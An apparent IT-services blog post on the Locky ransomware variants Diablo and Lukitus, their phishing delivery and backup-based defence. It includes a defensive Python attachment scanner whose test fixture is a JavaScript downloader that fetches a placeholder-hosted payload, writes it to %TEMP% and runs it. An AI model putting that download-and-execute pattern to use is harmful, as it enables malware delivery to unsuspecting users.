One of the most successful ransomware families, Locky, has returned with two new variants, ‘Lukitus’ and ‘Diablo’.  Locky is a family of file-encrypting malware that spreads primarily through malicious email attachments.  It stands out among ransomware families because, since it first appeared in 2016, it has gone dormant several times only to reemerge each time with updated code and a fresh spam campaign.

The latest version of Locky reactivated on August 9th and is being distributed through the Necurs botnet.  Necurs is one of the largest botnets in the world, with as many as 6 million infected endpoints available to send malware-laden email worldwide.  Locky had been dormant on Necurs since May, and researchers speculate that its reemergence is connected to the release of recent decryption tools: earlier in the summer, Kaspersky Lab released a free decryptor for Jaff, the ransomware Necurs had been pushing in Locky’s absence.  With its newer ransomware rendered impotent, the botnet operators appear to have fallen back on an older family.

None of this makes Locky less dangerous; quite the opposite.  The family keeps returning precisely because its encryption has held up against decryption efforts and its code is frequently updated.  The two new variants, Diablo and Lukitus, are no different and have been seen hitting machines running Windows XP, Windows 7, and Windows 10 in countries around the world.  So far the US and EU appear to have been hit hardest, but isolated cases have appeared in Asia, South America and Africa.

As with most ransomware, the new variants of Locky spread through malicious spam campaigns: phishing emails carrying attachments with malicious payloads.  This time the delivery method of choice is a .zip archive containing a JavaScript file.  If the user opens the attachment and runs the script, it downloads the Locky executable, which then encrypts the user’s files, including files on network shares the machine can reach, and renames them with the new variant’s extension (.diablo6 for Diablo, .lukitus for Lukitus).  Once that has happened, the victim is told to download and install the Tor Browser, visit a payment page on the Tor network, and pay the ransom.
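A mail gateway or help desk can catch this lure before anyone double-clicks it.  The following Python script is an added example written for this post, not code from the Locky campaign or from any vendor: it builds a small zip archive in memory that mimics the described attachment (a JavaScript downloader hidden behind a document-looking name), then flags archive members by extension, by double-extension or whitespace tricks in the file name, and by the Windows Script Host objects a downloader needs to fetch, write and run a second stage.  The file names, the example script body and the URL in it are constructed for illustration; the extension lists and marker strings are assumptions a practitioner would tune for their own environment.

```python
"""Attachment triage for script-in-archive lures (added example, not from the article)."""
import io
import zipfile
from typing import Dict, List

# Extensions that Windows hands to the Windows Script Host or runs directly on double-click.
# Assumed list for illustration; extend it for your own gateway policy.
SCRIPT_EXTENSIONS = {
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
    ".exe", ".scr", ".lnk", ".jar", ".cmd", ".bat",
}

# Benign-looking extensions used as the "outer" part of a double extension (invoice.pdf.js).
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}

# Windows Script Host / COM objects a JavaScript downloader needs: fetch over HTTP,
# write the response to disk, execute it.  Two or more together is a strong signal.
DOWNLOADER_MARKERS = (b"ActiveXObject", b"XMLHTTP", b"ADODB.Stream", b"WScript.Shell")


def inspect_member(name: str, content: bytes) -> List[str]:
    """Return the reasons a single archive member looks like a lure (empty list if clean)."""
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]
    parts = base.split(".")
    final_ext = "." + parts[-1] if len(parts) > 1 else ""

    if final_ext in SCRIPT_EXTENSIONS:
        reasons.append(f"directly executable member ({final_ext})")
    # "invoice.pdf.js" or "invoice.pdf        .js": the real extension is the last one.
    if len(parts) > 2 and "." + parts[-2].strip() in DOCUMENT_EXTENSIONS and final_ext in SCRIPT_EXTENSIONS:
        reasons.append("double extension disguises script as document")
    if "  " in base:
        reasons.append("whitespace padding hides the real extension")

    hits = [m.decode() for m in DOWNLOADER_MARKERS if m in content]
    if len(hits) >= 2:
        reasons.append("script body uses WSH download-and-execute objects: " + ", ".join(hits))
    return reasons


def scan_zip(data: bytes) -> Dict[str, List[str]]:
    """Map every flagged member of an in-memory zip to the reasons it was flagged."""
    flagged: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Cap the read so a zip bomb cannot exhaust memory during triage.
            content = zf.open(info).read(64 * 1024)
            reasons = inspect_member(info.filename, content)
            if reasons:
                flagged[info.filename] = reasons
    return flagged


def should_block(data: bytes) -> bool:
    """Gateway verdict: quarantine the message if any member is suspicious."""
    return bool(scan_zip(data))


def _zip_of(members: Dict[str, bytes]) -> bytes:
    """Build a zip archive in memory from {name: content} (test fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed JavaScript downloader body: fetches a second stage, writes it to %TEMP%, runs it.
# The URL is a placeholder; nothing here is taken from a real campaign.
SAMPLE_LURE_JS = b"""
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://example.invalid/payload", false);
x.send();
var sh = new ActiveXObject("WScript.Shell");
var p = sh.ExpandEnvironmentStrings("%TEMP%") + "\\\\payload.exe";
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile(p, 2);
sh.Run(p);
"""


def sample_lure() -> bytes:
    """Constructed attachment resembling the lure described above."""
    return _zip_of({"invoice_2017-08-09.pdf.js": SAMPLE_LURE_JS})


def sample_benign() -> bytes:
    """Constructed attachment that should pass: a plain PDF placeholder."""
    return _zip_of({"invoice_2017-08-09.pdf": b"%PDF-1.4\n%constructed placeholder\n"})


if __name__ == "__main__":
    for label, blob in (("lure", sample_lure()), ("benign", sample_benign())):
        print(label, "->", "BLOCK" if should_block(blob) else "allow", scan_zip(blob))
```

Run it stand-alone and the constructed lure is blocked on three counts (executable extension, double extension, download-and-execute objects) while the plain PDF passes.  Blocking on the extension alone is the important rule: a downloader that obfuscates its strings will not trip the marker check, but it still has to arrive as something the Script Host will run.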

Currently there are no decryption tools capable of recovering files encrypted by Locky.  While antivirus software has gotten better at detecting ransomware such as Locky, we would like to stress that the best defense is an up-to-date backup that the malware cannot reach: a backup drive or share that stays mapped on an infected machine will be encrypted along with everything else, so backups belong on versioned cloud storage or on offsite external storage that is disconnected between runs.  Either gives your business a fast recovery option if it does have the misfortune of being infected.

If your business encounters this ransomware and needs assistance, or would like help setting up a secure backup plan, contact us and we will work with you to develop a solution.